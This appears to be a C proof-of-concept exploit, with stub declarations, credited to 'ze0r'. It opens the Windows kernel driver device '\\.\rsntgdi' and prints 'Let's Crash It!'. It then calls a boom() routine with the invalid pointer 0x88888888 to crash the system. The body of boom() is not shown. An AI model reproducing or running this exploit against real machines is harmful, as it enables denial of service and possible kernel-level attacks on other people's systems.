
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int PVOID ;


 scalar_t__ CreateFile (char*,int ,int,int ,int ,int ,int ) ;
 scalar_t__ DriverHandle ;
 int FILE_SHARE_READ ;
 int FILE_SHARE_WRITE ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int OPEN_EXISTING ;
 int boom (int ,int ) ;
 int getchar () ;
 int printf (char*) ;

int main(int argc, char* argv[])
{
 printf("-------------------------------------------------------------------------------\n");
 printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n");
 printf("----------------------------------QQ:289791332---------------------------------\n");
 printf("-------------------------------------------------------------------------------\n\n");
 DriverHandle=CreateFile("\\\\.\\rsntgdi",
 0,
 FILE_SHARE_READ | FILE_SHARE_WRITE ,
 0,
 OPEN_EXISTING,0,0);
 if (DriverHandle == INVALID_HANDLE_VALUE)
 {
  printf("Open Driver Error!\n\n");
  return 0 ;
 }

 printf("OK.Let's Crash It!\n\n");
 getchar();

 boom((PVOID)0x88888888,(PVOID)0x88888888);

 return 0;
}
